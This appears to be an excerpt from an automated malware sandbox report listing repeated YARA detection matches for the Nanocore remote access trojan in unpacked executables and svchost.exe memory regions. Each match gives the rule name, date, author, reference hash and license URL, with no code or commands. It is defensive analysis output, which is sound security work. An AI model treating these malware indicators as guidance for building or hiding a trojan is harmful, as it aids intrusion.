            Source: 10.2.s9SWgUgyO5.exe.48b3891.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.481b13f.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.481b13f.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.481b13f.14.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 14.0.svchost.exe.49a0da0.20.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 14.0.svchost.exe.49a0da0.20.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 14.0.svchost.exe.49a0da0.20.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 10.3.s9SWgUgyO5.exe.48d3cc6.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 10.2.s9SWgUgyO5.exe.71be8a4.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.71be8a4.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.6e30000.23.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.6e30000.23.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.7180000.31.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.7180000.31.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 14.0.svchost.exe.49a0da0.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 14.0.svchost.exe.49a0da0.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 14.0.svchost.exe.49a0da0.9.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 10.2.s9SWgUgyO5.exe.71b0000.33.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.71b0000.33.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.6fc0000.25.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.6fc0000.25.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.3.s9SWgUgyO5.exe.48d3cc6.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.3.s9SWgUgyO5.exe.48d3cc6.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.4627f21.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.4627f21.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 10.2.s9SWgUgyO5.exe.2d353fc.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.2d353fc.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 10.2.s9SWgUgyO5.exe.2d353fc.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 10.2.s9SWgUgyO5.exe.4634155.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 10.2.s9SWgUgyO5.exe.4634155.9.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 14.0.svchost.exe.4914f80.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 14.0.svchost.exe.4914f80.21.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 27.0.svchost.exe.5084f80.20.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 27.0.svchost.exe.5084f80.20.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 10.3.s9SWgUgyO5.exe.48e82f1.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 0000000A.00000002.526244100.0000000007150000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 0000000A.00000002.526244100.0000000007150000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 0000000A.00000002.526184455.0000000006FF0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 0000000A.00000002.526184455.0000000006FF0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 0000000A.00000002.525611849.0000000006000000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 0000000A.00000002.525611849.0000000006000000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 0000000A.00000002.526053509.0000000006E20000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 0000000A.00000002.526053509.0000000006E20000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 0000000A.00000002.526069628.0000000006E30000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 0000000A.00000002.526069628.0000000006E30000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 0000000A.00000002.526170898.0000000006FE0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 0000000A.00000002.526170898.0000000006FE0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 0000000A.00000002.526125965.0000000006FB0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 0000000A.00000002.526125965.0000000006FB0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 0000000A.00000002.509785046.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 0000000A.00000002.509785046.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 0000000A.00000002.522721839.00000000047BF000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 0000000A.00000002.515818035.0000000002CFC000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 0000000A.00000002.526153225.0000000006FD0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 0000000A.00000002.526153225.0000000006FD0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 0000001B.00000000.376574756.0000000005084000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 0000001B.00000000.376574756.0000000005084000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 0000000A.00000002.526203306.0000000007000000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 0000000A.00000002.526203306.0000000007000000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 0000000E.00000000.360439526.0000000004914000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 0000000E.00000000.360439526.0000000004914000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 0000000A.00000003.486623821.00000000048CB000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 0000000A.00000002.526365497.00000000071E0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 0000000A.00000002.526365497.00000000071E0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 0000000A.00000002.526138671.0000000006FC0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 0000000A.00000002.526138671.0000000006FC0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 0000000A.00000002.526340220.00000000071B0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 0000000A.00000002.526340220.00000000071B0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 0000000A.00000002.526292009.0000000007180000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 0000000A.00000002.526292009.0000000007180000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 0000000A.00000002.522820033.00000000048AA000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 0000000E.00000000.382552554.0000000004914000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 0000000E.00000000.382552554.0000000004914000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 0000000A.00000002.525659501.00000000060A0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 0000000A.00000002.525659501.00000000060A0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
